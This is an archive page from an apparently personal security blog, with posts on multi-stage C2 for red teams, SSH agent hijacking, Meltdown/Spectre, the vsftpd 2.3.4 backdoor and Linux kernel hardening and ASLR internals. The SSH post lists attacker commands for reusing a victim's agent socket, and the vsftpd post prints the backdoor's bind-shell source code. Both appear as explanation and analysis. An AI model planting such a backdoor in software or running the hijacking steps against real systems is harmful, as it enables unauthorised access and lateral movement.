xorl %eax, %eax

Archive for the ‘security’ Category

Multi-stage C&C and Red Teams

leave a comment »

A few days ago I read this excellent analysis by TALOS team and apparently, the most interesting part from a technical perspective is the high-OPSEC multi-stage Command & Control infrastructure which is described by the following diagram from TALOS team’s post.



The idea is that only if the infected system is verified by the first stage C2, it will open a firewall hole on the real/second-stage C&C server to start the communication. On top of that, it using domain fronting to hide behind Cloudflare, a very popular technique.

So, why am I writing this post?
This post is for any red teamers reading this. Most mature red teams are using domain fronting to emulate advanced adversaries, and the notion of multi-stage C&C is not something new. See for example MITRE’s T1104 from the ATT&CK framework that explains a few known APT groups that use this method. However, how many times have you seen a red team actually employing this? I know it is a setup that increases complexity but if you are getting paid to simulate some advanced adversary, do it.

Please read TALOS team’s post and remember, if someone gives you money to simulate what a real APT would do, do it properly. :)

Written by xorl

February 11, 2018 at 17:04

Posted in security

SSH Hijacking for lateral movement

leave a comment »

A few weeks ago I contributed the SSH Hijacking lateral movement technique to MITRE’s ATT&CK framework. In this post I’ll go through the different implementations of this attack that I have come across so far to provide more details around it. Note that by hijacking here we mean that someone abuses the existing sessions without having access to the authentication details. So, without using stolen credentials or private keys.

ControlMaster
SSH’s ControlMaster is a feature which allows multiplexed connections. Performance wise this is great since you only have to authenticate to the target system on the first SSH session and then, depending on the SSH daemon configuration you can open multiple new SSH sessions through the already established connection. This can be tuned on the server side with the following two directives.

MaxSessions
Specifies the maximum number of open sessions permitted per
network connection. The default is 10.

MaxStartups
Specifies the maximum number of concurrent unauthenticated
connections to the SSH daemon. Additional connections will
be dropped until authentication succeeds or the LoginGraceTime
expires for a connection. The default is 10. 

By setting MaxSessions to 1 you can disable ControlMaster/session multiplexing and each new session will require a complete new connection that includes the authentication step. However, if you don’t, then regardless of how strong authentication method you are employing for your users, an attacker only has to get code execution to one of your user’s endpoints and wait for that user to SSH somewhere. The attacker can look for the open connections by inspecting the directory specified by ControlPath directive on the client’s side or just using common tools like netstat. Then, if the attacker attempts to open an SSH session to a host that it is already in the ControlMaster, it will require no authentication or establishing a new connection as it is re-using the existing one. Note that ControlMaster is enabled by default.

Agent Authentication
To reduce friction and make the experience more smooth many organizations employ the use of SSH-agent which is a service that allows authentication via a local socket file. When you connect to a remote system you can choose if you want your ssh-agent to be available there too using the ForwardAgent directive. By forwarding the agent you can move around systems without having to copy keys everywhere or re-authenticating manually. However, this has a downside too. If an attacker has root access on any of the systems from which you have forwarded your agent, he can re-use that socket file to open new SSH sessions with your information. Here is a very brief overview of how this is done.

# Attacker finds the SSHd process of the victim
ps uax|grep sshd

# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ

# Attacker hijack's victim's ssh-agent socket
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l

# Attacker can login to remote systems as the victim
ssh remote_system -l vicitm

If you are using OpenSSH, you can mitigate this threat by using the AllowAgentForwarding directive to ensure that only the hosts that need it will have it, rather than the entire environment.

In both of those cases, the attacker never had direct access to the authentication details. However, by abusing SSH features an attacker is able to move laterally into the environment without causing a lot of noise. I already gave some native SSH directives that can be used to mitigate this threat but of course, depending on your requirements you might have to come up with something different.

Written by xorl

February 4, 2018 at 18:32

Posted in security

Thoughts on Meltdown & Spectre

leave a comment »

2018 started with some unique low-level exploitation techniques disclosure. People that never cared about processor architecture suddenly explain how speculative execution, advanced side-channel analysis, and cache level works in modern high-performance processors, others confuse the different architecture design flaws, media and software vendors are heavily controlled by big processor manufacturers, Linus accepts patches with up to 30% performance impact without a question, and within that chaos we still miss some crucial details. In this post, I will give my thoughts on the following five domains regarding the Meltdown & Spectre exploitation.

  • Real-world impact
  • The victims/targets
  • Media manipulation
  • Nation-state
  • Mitigations



Real-world impact
For any of the disclosed exploitation methods, there is very limited real-world impact (yes, even for the JavaScript one on browsers with SharedArrayBuffer). The reason for this is that those attacks cannot be easily automated. They are definitely feasible, but they require manual intervention to provide any value to the attacker. Consequently, their use would only be useful on targeted attacks. But even in this case, why would an attacker prefer to read arbitrary memory using this extremely slow technique instead of exploitation a privilege escalation vulnerability and get much faster access to all system resources? One could argue because it is more covert. Well, there are some actual attack use cases and this is my next domain.

The victims/targets
The only real victim that this attack is more valuable than privilege escalation attacks is shared hosting providers. Whether that is virtual machines, containers, or anything similar. Those exploitation techniques break the sole business model of those companies. Huge players like Amazon, Google, Microsoft, etc. are selling exactly what Meltdown & Spectre proved that it doesn’t exist, high quality isolation between shared resources. And that brings us to the next domain.

Media manipulation
All of those big players, including manufacturers such as Intel, AMD, and the rest of the affected vendors, did a first-class crisis management when it comes to managing the reputation impact and press statements. They should probably be giving trainings on how to do this. You would expect that an attack that obliterates your core business selling point would result in massive stock price drops, media chasing the board all over the world, people moving away from those vendors, executives getting fired… Yet, nothing happened. From the business perspective this is a remarkable work of crisis management, but from the consumer perspective this is an alarming level of media manipulation power.

Nation-state
Talking about power, let’s talk about nation-states. Those attacks were not really new. Dave Aitel released this Immunity paper from 2014 that pretty much implements a variant of those exploitation techniques. If we move even further back, we have this paper from 1995 which goes through multiple security flaws of the x86 architecture, including the pre-fetching one. The latter document also contains an interesting sentence in its introduction.

This analysis is being performed under the auspices of the National Security Agency’s Trusted Product Evaluation Program (TPEP).

So, we know that NSA knew about those design flaws for at least 23 years. Realistically speaking, it is safe to assume that they would have tried to exploit them. Recently after the public disclosure of the attack the ShadowBrokers started offering some (allegedly) 0day exploits for those flaws claiming to be part of NSA’s toolkit.



Just to be clear, I totally endorse NSA, or any other nation-state for that matter, not disclosing them. They had already disclosed the research paper so the entire world knew about them (including Intel, AMD, and the rest). A tool that allows you to bypass the false sense of memory isolation a cloud provider offers would be extremely valuable for any offensive security team. It is the companies’ fault that they did not fix it. Nevertheless, it was worth mentioning. And talking about fixing…

Mitigations
There are a few different mitigations being proposed or already implemented. Let’s briefly go through them…

  • On the OS side we have we the KAISER/KPTI implementation which basically separates the kernel and user-space pages requiring TLB flushes (reloading of CR3 register or the use of Process Context Identifier (PCID) where available). Depending on the application, this can have major performance impact but, on the other hand, it also prevents a large number of exploitation techniques that were already used in the wild. So, security wise it is great, but business wise it will require extra funding for scaling for most companies. And guess what? The manufacturers of those processors are not held accountable for this (they should in my opinion as it was a known issue for decades).
  • The other proposed mitigation was the use of LFENCE instruction to literally stop speculative execution on specific code paths. A clever approach which however is hard to implement and deploy in the real world if you don’t want to have massive performance impact.
  • Intel issued a microcode update that also adds some new capabilities. Those are the IBRS (Indirect Branch Restricted Speculation), STITBP (Single Thread Indirect Branch Prediction), and IBPB (Indirect Branch Predictor Barrier). All can be used to control when branch prediction and indirect jumps are allowed. However, it brings another interesting attack vector… If Intel can dynamically reprogram their processors via a UEFI channel, maybe attackers can too. Sounds like an interesting research area now that the updates are out.
  • The last one is to recompile the code with a compiler that adds the concept of “return trampolines” (retpoline) which ensures that indirect near jumps and call instructions are bundled with some details about the target of the branch to avoid the cases of branch target injection attacks of Spectre. Again, good idea but expecting to recompile all binaries using this is not a trivial operation.

As a conclusion, the Meltdown & Spectre exploitation techniques sound like one of the biggest cover-up stories of the infosec community. Known for 20+ years, breaking core business models, nation-states researching them for decades… And yet… No repercussions or even media pressure to any of the involved parties behind them.

Written by xorl

January 10, 2018 at 10:40

Posted in security

vsftpd 2.3.4 Backdoor

with 4 comments

This was a recent discovery by Chris Evans and you can read more details in his blog post available here. Furthermore, you can find information about this incident at The H Open as well as LWN.net websites.

So, the backdoor affects specifically 2.3.4 version of the popular FTP daemon and can be found in str.c file which contains code for handling the string manipulation routines.

int
str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
{
  static struct mystr s_curr_line_str;
  unsigned int pos = 0;
  while (str_getline(p_str, &s_curr_line_str, &pos))
  {
    if (str_equal(&s_curr_line_str, p_line_str))
    {
      return 1;
    }
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))
    {
       vsf_sysutil_extra();
    }
  }
  return 0;
}

Quite obvious. While parsing the received string values, if the string begins with “\x3A\x29” which in ASCII translates to ‘:)’ (a smiley face), it will invoke vsf_sysutil_extra().

This backdoor function was placed in sysdeputil.c file and looks like this:

int
vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  exit(1); 
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  { 
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0); 
  } 
}

It simply opens a new TCP socket listening on port 6200 that will spawn a shell when connected to this port.

So, by using the ‘:)’ as username the attackers were able to trigger this backdoor in vsftpd 2.3.4.

Written by xorl

July 5, 2011 at 03:54

Posted in hax, security

GRKERNSEC_KERN_LOCKOUT Active Kernel Exploit Response

leave a comment »

This is a brand new feature of “Address Space Protection” that grsecurity offers. Its configuration option is very clear and it is implemented by adding just two new routines in the existing patch.

config GRKERNSEC_KERN_LOCKOUT
	bool "Active kernel exploit response"
	depends on X86
	help
	  If you say Y here, when a PaX alert is triggered due to suspicious
	  activity in the kernel (from KERNEXEC/UDEREF/USERCOPY)
	  or an OOPs occurs due to bad memory accesses, instead of just
	  terminating the offending process (and potentially allowing
	  a subsequent exploit from the same user), we will take one of two
	  actions:
	   If the user was root, we will panic the system
	   If the user was non-root, we will log the attempt, terminate
	   all processes owned by the user, then prevent them from creating
	   any new processes until the system is restarted
	  This deters repeated kernel exploitation/bruteforcing attempts
	  and is useful for later forensics.

First of all, the ‘user_struct’ at include/linux/sched.h was updated to include two new members that will be used to keep track of the banned users. Here is the code snippet that shows the newly added members.

/*
 * Some day this will be a full-fledged user tracking system..
 */
struct user_struct {
   ...
        struct key *session_keyring;    /* UID's default session keyring */
#endif
 
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	unsigned int banned;
	unsigned long ban_expires;
#endif
   ...
};

Next we can have a look at grsecurity/grsec_sig.c to see the first function which is responsible for handling the banned users.

int gr_process_user_ban(void)
{
#if defined(CONFIG_GRKERNSEC_KERN_LOCKOUT) || defined(CONFIG_GRKERNSEC_BRUTE)
	if (unlikely(current->cred->user->banned)) {
		struct user_struct *user = current->cred->user;
		if (user->ban_expires != ~0UL && time_after_eq(get_seconds(), user->ban_expires)) {
			user->banned = 0;
			user->ban_expires = 0;
			free_uid(user);
		} else
			return -EPERM;
	}
#endif
	return 0;
}

What it does is checking if the user is banned and if this is the case, wait for ‘user->ban_expires’ to reset its status. Of course, this does not apply to users with values of ‘~0UL’ in ‘ban_expires’ variable. Those users will be banned until the system is restarted.

The next routine also located in the same source code file is this one.

void gr_handle_kernel_exploit(void)
{
#ifdef CONFIG_GRKERNSEC_KERN_LOCKOUT
	const struct cred *cred;
	struct task_struct *tsk, *tsk2;
	struct user_struct *user;
	uid_t uid;

	if (in_irq() || in_serving_softirq() || in_nmi())
		panic("grsec: halting the system due to suspicious kernel crash caused in interrupt context");

	uid = current_uid();

	if (uid == 0)
		panic("grsec: halting the system due to suspicious kernel crash caused by root");
	else {
		/* kill all the processes of this user, hold a reference
		   to their creds struct, and prevent them from creating
		   another process until system reset
		*/
		printk(KERN_ALERT "grsec: banning user with uid %u until system restart for suspicious kernel crash\n", uid);
		/* we intentionally leak this ref */
		user = get_uid(current->cred->user);
		if (user) {
			user->banned = 1;
			user->ban_expires = ~0UL;
		}

		read_lock(&tasklist_lock);
		do_each_thread(tsk2, tsk) {
			cred = __task_cred(tsk);
			if (cred->uid == uid)
				gr_fake_force_sig(SIGKILL, tsk);
		} while_each_thread(tsk2, tsk);
		read_unlock(&tasklist_lock);
	}
#endif
}

So, if this is called in the context of an interrupt (IRQ, SoftIRQ or NMI) or the current user is root, it will immediately invoke panic() to halt the system and avoid any possible further exploitation of a kernel vulnerability. In any other case it will log the event and ban that user by updating the ‘user->banned’ and ‘user->ban_expires’ members of the ‘user_struct’ structure. The final ‘while_each_thread’ loop will use gr_fake_force_sig() which is shown below to terminate (by sending kill signal) every task owned by the user who triggered the event.

#ifdef CONFIG_GRKERNSEC
extern int specific_send_sig_info(int sig, struct siginfo *info, struct task_struct *t);

int gr_fake_force_sig(int sig, struct task_struct *t)
{
	unsigned long int flags;
	int ret, blocked, ignored;
	struct k_sigaction *action;

	spin_lock_irqsave(&t->sighand->siglock, flags);
	action = &t->sighand->action[sig-1];
	ignored = action->sa.sa_handler == SIG_IGN;
	blocked = sigismember(&t->blocked, sig);
	if (blocked || ignored) {
		action->sa.sa_handler = SIG_DFL;
		if (blocked) {
			sigdelset(&t->blocked, sig);
			recalc_sigpending_and_wake(t);
		}
	}
	if (action->sa.sa_handler == SIG_DFL)
		t->signal->flags &= ~SIGNAL_UNKILLABLE;
	ret = specific_send_sig_info(sig, SEND_SIG_PRIV, t);

	spin_unlock_irqrestore(&t->sighand->siglock, flags);

	return ret;
}
#endif

This routine will send the requested signal to the process.

So, now to the actual patching, the first patched code is the __kprobes oops_end() routine located at arch/x86/kernel/dumpstack.c file.

void __kprobes oops_end(unsigned long flags, struct pt_regs *regs, int signr)
{
   ...
 	if (panic_on_oops)
 		panic("Fatal exception");

	gr_handle_kernel_exploit();

	do_group_exit(signr);
}

This is triggered at the last step of a kernel OOPS. Consequently, it’s an ideal location to place this protection. Next we have the ‘execve’ routines that are invoked for spawning new processes. Specifically, the compat_do_execve() you see here from fs/compat.c file.

/*
 * compat_do_execve() is mostly a copy of do_execve(), with the exception
 * that it processes 32 bit argv and envp pointers.
 */
int compat_do_execve(char * filename,
        compat_uptr_t __user *argv,
        compat_uptr_t __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

Which is where it checks if the user is banned. Of course, similar check is also included in the do_execve() system call from fs/exec.c.

/*
 * sys_execve() executes a new program.
 */
int do_execve(const char * filename,
        const char __user *const __user *argv,
        const char __user *const __user *envp,
        struct pt_regs * regs)
{
   ...
 	bprm->interp = filename;
 
	if (gr_process_user_ban()) {
		retval = -EPERM;
		goto out_file;
	}
   ...
out_ret:
        return retval;
}

Finally, the pax_report_usercopy() is updated to handle the possible attacks using the new locking-out feature.

	
void pax_report_usercopy(const void *ptr, unsigned long len, bool to, const char *type)
{
	if (current->signal->curr_ip)
		printk(KERN_ERR "PAX: From %pI4: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			&current->signal->curr_ip, to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);
	else
		printk(KERN_ERR "PAX: kernel memory %s attempt detected %s %p (%s) (%lu bytes)\n",
			to ? "leak" : "overwrite", to ? "from" : "to", ptr, type ? : "unknown", len);

	dump_stack();
	gr_handle_kernel_exploit();
	do_group_exit(SIGKILL);
}

Written by xorl

April 27, 2011 at 22:43

Posted in grsecurity, linux, security

Linux kernel /proc/slabinfo Protection

with 3 comments

Recently, Dan Rosenberg committed this patch to the Linux kernel. The patch affects SLAB and SLUB allocators by changing the permissions of the ‘/proc/slabinfo’ file in slab_proc_init() for SLAB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo",S_IWUSR|S_IRUGO,NULL,&proc_slabinfo_operations);
+	proc_create("slabinfo", S_IWUSR|S_IRUSR, NULL,
+		    &proc_slabinfo_operations);
#ifdef CONFIG_DEBUG_SLAB_LEAK

As well as in the equivalent slab_proc_init() for SLUB.

static int __init slab_proc_init(void)
{
-	proc_create("slabinfo", S_IRUGO, NULL, &proc_slabinfo_operations);
+	proc_create("slabinfo", S_IRUSR, NULL, &proc_slabinfo_operations);
 	return 0;
}

The concept behind this is something quite simple which was previously implemented in grsecurity (check out GRKERNSEC_PROC_ADD) by spender. Almost anyone who has ever developed a kernel heap exploit for the Linux kernel knows that using ‘/proc/slabinfo’ you can easily track the status of the SLAB you are corrupting.
This patch limits the reliability of Linux kernel heap exploitation since unprivileged users can no longer read this PROCFS file.

Written by xorl

March 5, 2011 at 14:22

Posted in linux, security

Linux kernel ASLR Implementation

with 4 comments

Since June 2005 (specifically 2.6.12), Linux kernel has build-in ASLR (Address space Layout Randomization) support. In this post I’m trying to give a brief description of how this is implemented. However, I will be focusing more to the x86 architecture since this protection mechanism leads to some architecture dependent issues.

Random Number Generation
The PRNG used for ASLR of Linux kernel is the get_random_int() routine as we’ll see later in this post. This function is located at drivers/char/random.c file and it is shown below.

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];
  ...
/*
 * Get a random word for internal kernel use only. Similar to urandom but
 * with the goal of minimal entropy pool depletion. As a result, the random
 * value is not cryptographically secure but for several uses the cost of
 * depleting entropy is too high
 */
DEFINE_PER_CPU(__u32 [4], get_random_int_hash);
unsigned int get_random_int(void)
{
        struct keydata *keyptr;
        __u32 *hash = get_cpu_var(get_random_int_hash);
        int ret;

        keyptr = get_keyptr();
        hash[0] += current->pid + jiffies + get_cycles();

        ret = half_md4_transform(hash, keyptr->secret);
        put_cpu_var(get_random_int_hash);

        return ret;
}

After defining some per-processor values, it uses the get_cpu_var()/put_cpu_var() C macros to get and store the random hash to the processor specific array. This is leaving us with get_keyptr() which initializes the ‘keydata’ structure and the actual random number generation.
The ‘keydata’ initialization is performed using this C function:

static struct keydata {
        __u32 count; /* already shifted to the final position */
        __u32 secret[12];
} ____cacheline_aligned ip_keydata[2];

static unsigned int ip_cnt;
  ...
static inline struct keydata *get_keyptr(void)
{
        struct keydata *keyptr = &ip_keydata[ip_cnt & 1];

        smp_rmb();

        return keyptr;
}

The smp_rmb() macro is defined in arch/x86/include/asm/system.h header file for the x86 architecture and it stands for Read Memory Barrier.

/*
 * Force strict CPU ordering.
 * And yes, this is required on UP too when we're talking
 * to devices.
 */
#ifdef CONFIG_X86_32
/*
 * Some non-Intel clones support out of order store. wmb() ceases to be a
 * nop for these.
 */
#define mb() alternative("lock; addl $0,0(%%esp)", "mfence", X86_FEATURE_XMM2)
#define rmb() alternative("lock; addl $0,0(%%esp)", "lfence", X86_FEATURE_XMM2)
#define wmb() alternative("lock; addl $0,0(%%esp)", "sfence", X86_FEATURE_XMM)
#else
#define mb()    asm volatile("mfence":::"memory")
#define rmb()   asm volatile("lfence":::"memory")
#define wmb()   asm volatile("sfence" ::: "memory")
#endif
  ...
#ifdef CONFIG_SMP
#define smp_mb()        mb()
#ifdef CONFIG_X86_PPRO_FENCE
# define smp_rmb()      rmb()
#else
# define smp_rmb()      barrier()
#endif

This is used to flush any pending read that subsequent reads depend on. As we can read in the same header file:

 * No data-dependent reads from memory-like regions are ever reordered
 * over this barrier.  All reads preceding this primitive are guaranteed
 * to access memory (but not necessarily other CPUs' caches) before any
 * reads following this primitive that depend on the data return by
 * any of the preceding reads.  This primitive is much lighter weight than
 * rmb() on most CPUs, and is never heavier weight than is
 * rmb().
 *
 * These ordering constraints are respected by both the local CPU
 * and the compiler.
 *
 * Ordering is not guaranteed by anything other than these primitives,
 * not even by data dependencies.  See the documentation for
 * memory_barrier() for examples and URLs to more information.

This ensures that ‘keyptr’ initialization doesn’t get reordered and back to get_random_int() we can now have a look at the exact random number generation code. According to:

hash[0] += current->pid + jiffies + get_cycles()

We have four different variables being involved. Those are:
– The address of the first element of the ‘hash[0]’ array
– The currently executing process ID for the processor that handles this
– The system’s jiffies value
– CPU cycles number
The last variable is derived from get_cycles() inline function that is defined at arch/x86/include/asm/tsc.h for the x86 architecture.

static inline cycles_t get_cycles(void)
{
        unsigned long long ret = 0;

#ifndef CONFIG_X86_TSC
        if (!cpu_has_tsc)
                return 0;
#endif
        rdtscll(ret);

        return ret;
}

This means that if the processor supports rdtsc instruction it will jump to arch/x86/include/asm/msr.h header file to execute the following C macro:

static __always_inline unsigned long long __native_read_tsc(void)
{
        DECLARE_ARGS(val, low, high);

        asm volatile("rdtsc" : EAX_EDX_RET(val, low, high));

        return EAX_EDX_VAL(val, low, high);
}
  ...
#define rdtscll(val)                                            \
        ((val) = __native_read_tsc())

Which basically, simply executes the rdtsc instruction.
Back to get_random_int() we can see that even though there are a lot of difficult to guess variables being used to generate that pseudo-random integer, it also calls half_md4_transform() which is defined at lib/halfmd4.c and it implements a basic MD4 algorithm.

/* F, G and H are basic MD4 functions: selection, majority, parity */
#define F(x, y, z) ((z) ^ ((x) & ((y) ^ (z))))
#define G(x, y, z) (((x) & (y)) + (((x) ^ (y)) & (z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
  ...
#define ROUND(f, a, b, c, d, x, s)      \
        (a += f(b, c, d) + x, a = (a << s) | (a >> (32 - s)))
#define K1 0
#define K2 013240474631UL
#define K3 015666365641UL
  ...
__u32 half_md4_transform(__u32 buf[4], __u32 const in[8])
{
        __u32 a = buf[0], b = buf[1], c = buf[2], d = buf[3];

        /* Round 1 */
        ROUND(F, a, b, c, d, in[0] + K1,  3);
        ROUND(F, d, a, b, c, in[1] + K1,  7);
        ROUND(F, c, d, a, b, in[2] + K1, 11);
        ROUND(F, b, c, d, a, in[3] + K1, 19);
        ROUND(F, a, b, c, d, in[4] + K1,  3);
        ROUND(F, d, a, b, c, in[5] + K1,  7);
        ROUND(F, c, d, a, b, in[6] + K1, 11);
        ROUND(F, b, c, d, a, in[7] + K1, 19);

        /* Round 2 */
        ROUND(G, a, b, c, d, in[1] + K2,  3);
        ROUND(G, d, a, b, c, in[3] + K2,  5);
        ROUND(G, c, d, a, b, in[5] + K2,  9);
        ROUND(G, b, c, d, a, in[7] + K2, 13);
        ROUND(G, a, b, c, d, in[0] + K2,  3);
        ROUND(G, d, a, b, c, in[2] + K2,  5);
        ROUND(G, c, d, a, b, in[4] + K2,  9);
        ROUND(G, b, c, d, a, in[6] + K2, 13);

        /* Round 3 */
        ROUND(H, a, b, c, d, in[3] + K3,  3);
        ROUND(H, d, a, b, c, in[7] + K3,  9);
        ROUND(H, c, d, a, b, in[2] + K3, 11);
        ROUND(H, b, c, d, a, in[6] + K3, 15);
        ROUND(H, a, b, c, d, in[1] + K3,  3);
        ROUND(H, d, a, b, c, in[5] + K3,  9);
        ROUND(H, c, d, a, b, in[0] + K3, 11);
        ROUND(H, b, c, d, a, in[4] + K3, 15);

        buf[0] += a;
        buf[1] += b;
        buf[2] += c;
        buf[3] += d;

        return buf[1]; /* "most hashed" word */
}

This makes things even more complex for anyone attempting to guess the resulted integer. Now that we have a basic understanding of the pseudo-random number generation routine utilized by the Linux ASLR implementation we can move on to the actual code that uses this.

brk(2) Randomization
At the fs/binfmt_elf.c is where the Linux kernel’s ELF loader is located. The routine that loads the actual executable binary file is the load_elf_binary() which among others includes the following code.

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
        unsigned long load_addr = 0, load_bias = 0;
  ...
#ifdef arch_randomize_brk
        if ((current->flags & PF_RANDOMIZE) && (randomize_va_space > 1))
                current->mm->brk = current->mm->start_brk =
                        arch_randomize_brk(current->mm);
#endif
  ...
out_free_ph:
        kfree(elf_phdata);
        goto out;
}

This means that if the ‘arch_randomize_brk’ is defined it will check if the current process should have a randomized virtual address space using ‘PF_RANDOMIZE’ flag as well as if the ‘randomize_va_space’ is greater than 1. If this is the case, it will update its current starting data segment address using the return address of arch_randomize_brk().
The latter routine can be found at arch/x86/kernel/process.c for the x86 family.

unsigned long arch_randomize_brk(struct mm_struct *mm)
{
        unsigned long range_end = mm->brk + 0x02000000;
        return randomize_range(mm->brk, range_end, 0) ? : mm->brk;
}

It calculates the end of the data segment by adding 0x02000000 to the starting address and then calling randomize_range() to randomize the given address space. This randomization routine is also placed in drivers/char/random.c and you can see it here:

/*
 * randomize_range() returns a start address such that
 *
 *    [...... <range> .....]
 *  start                  end
 *
 * a <range> with size "len" starting at the return value is inside in the
 * area defined by [start, end], but is otherwise randomized.
 */
unsigned long
randomize_range(unsigned long start, unsigned long end, unsigned long len)
{
        unsigned long range = end - len - start;

        if (end <= start + len)
                return 0;
        return PAGE_ALIGN(get_random_int() % range + start);
}

If the range is correct, it will invoke get_random_int() using the starting address and of course, the resulted value is aligned to the next page boundary as this is defined by the ‘PAGE_SIZE’ constant.

SYSCTL Interface
In the previous section we encountered a variable named ‘randomize_va_space’. As almost any Linux administrator knows, the Linux ASLR can be tuned using the ‘/proc/sys/vm/randomize_va_space’ or ‘kernel.randomize_va_space’ SYSCTL variable. In both cases the result is passing an integer value to the kernel as we can read at kernel/sysctl.c which is where this is defined.

static struct ctl_table kern_table[] = {
  ...
#if defined(CONFIG_MMU)
        {
                .procname       = "randomize_va_space",
                .data           = &randomize_va_space,
                .maxlen         = sizeof(int),
                .mode           = 0644,
                .proc_handler   = proc_dointvec,
        },
#endif
  ...
/*
 * NOTE: do not add new entries to this table unless you have read
 * Documentation/sysctl/ctl_unnumbered.txt
 */
        { }
};

The actual variable ‘randomize_va_space’ is placed in mm/memory.c as shown below.

/*
 * Randomize the address space (stacks, mmaps, brk, etc.).
 *
 * ( When CONFIG_COMPAT_BRK=y we exclude brk from randomization,
 *   as ancient (libc5 based) binaries can segfault. )
 */
int randomize_va_space __read_mostly =
#ifdef CONFIG_COMPAT_BRK
                                        1;
#else
                                        2;
#endif

Here, the ‘__read_mostly’ modifier is an architecture specific attribute which in case of x86 processors is defined in arch/x86/include/asm/cache.h header file.

#define __read_mostly __attribute__((__section__(".data..read_mostly")))

This forces the variable to be placed in a section called .data.read_mostly that is designed for static variables which are initialized once and very rarely changed.
From the kernel developers’ comment we can also see that if the compatibility support option for brk(2) system call is enabled, it will not randomize it since it could break old versions of C library. Additionally, this variable is defined in SYSCTL’s kernel table as we can find at kernel/sysctl_binary.c file.

static const struct bin_table bin_kern_table[] = {
  ...
        { CTL_INT,      KERN_RANDOMIZE,                 "randomize_va_space" },
  ...
        {}
};

Which uses the ‘KERN_RANDOMIZE’ value as this was defined in include/linux/sysctl.h header file.

/* CTL_KERN names: */
enum
{
  ...
        KERN_RANDOMIZE=68, /* int: randomize virtual address space */
  ...
};

Now that we have a basic understanding of what is going on in the kernel when manipulating that variable through SYSCTL interface, we can move to the more interesting parts…

Stack Randomization
The actual stack randomization takes place in fs/exec.c and more specifically in the setup_arg_pages() routine which is responsible for the final stage of stack initialization before executing a binary. Here is a code snippet that demonstrates how the stack randomization is implemented…

/*
 * Finalizes the stack vm_area_struct. The flags and permissions are updated,
 * the stack is optionally relocated, and some extra space is added.
 */
int setup_arg_pages(struct linux_binprm *bprm,
                    unsigned long stack_top,
                    int executable_stack)
{
  ...
#ifdef CONFIG_STACK_GROWSUP
  ...
#else
        stack_top = arch_align_stack(stack_top);
        stack_top = PAGE_ALIGN(stack_top);
  ...
out_unlock:
        up_write(&mm->mmap_sem);
        return ret;
}

If the stack segment does not grow upwards, it will use arch_align_stack() passing the stack top address which was an argument of setup_arg_pages() routine. Then it will align the returned value in a page boundary and continue with the stack segment setup. Assuming that we’re dealing with an x86 architecture, the initial function call will lead to arch/x86/kernel/process.c file where we can find the following code.

unsigned long arch_align_stack(unsigned long sp)
{
        if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
                sp -= get_random_int() % 8192;
        return sp & ~0xf;
}

The check is fairly simple. If the currently executed task doesn’t have ‘ADDR_NO_RANDOMIZE’ personality set which is used to disable the randomization and the ‘randomize_va_space’ has a non-zero value, it will invoke get_random_int() to perform the stack randomization. Before moving on, for completeness here is the include/linux/personality.h header file’s definition of the above personality constant value.

/*
 * Flags for bug emulation.
 *
 * These occupy the top three bytes.
 */
enum {
        ADDR_NO_RANDOMIZE =     0x0040000,      /* disable randomization of VA space */
  ...
};

Back to arch_align_stack(), after decrementing the stack pointer with the random number in case of an ASLR supported task, it’ll align it by masking it with 0xfffffff0 on 32-bit processors. However, a quick look in fs/binfmt_elf.c shows that this is not that simple since this is how it’s implemented in the ELF loader’s code…

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
  ...
        /* Do this so that we can load the interpreter, if need be.  We will
           change some of these later */
        current->mm->free_area_cache = current->mm->mmap_base;
        current->mm->cached_hole_size = 0;
        retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
                                 executable_stack);
  ...
        goto out;
}

We can see here that it passes a randomized stack top pointer using the randomize_stack_top() routine from the same source code file.

#ifndef STACK_RND_MASK
#define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12))     /* 8MB of VA */
#endif

static unsigned long randomize_stack_top(unsigned long stack_top)
{
        unsigned int random_variable = 0;

        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                random_variable = get_random_int() & STACK_RND_MASK;
                random_variable <<= PAGE_SHIFT;
        }
#ifdef CONFIG_STACK_GROWSUP
        return PAGE_ALIGN(stack_top) + random_variable;
#else
        return PAGE_ALIGN(stack_top) - random_variable;
#endif
}

Once again, the current process won’t be randomized if it doesn’t have ‘PF_RANDOMIZE’ flag and it has ‘ADDR_NO_RANDOMIZE’ personality set. Otherwise, it will use get_random_int() as well as the ‘STACK_RND_MASK’ to mask the returned integer. Although you see the definition of the latter constant in the given code snippet, it is originally defined in the architecture specific arch/x86/include/asm/elf.h header file.

#ifdef CONFIG_X86_32

#define STACK_RND_MASK (0x7ff)

This is pretty much the stack ASLR implementation of Linux.

mmap(2) Randomization
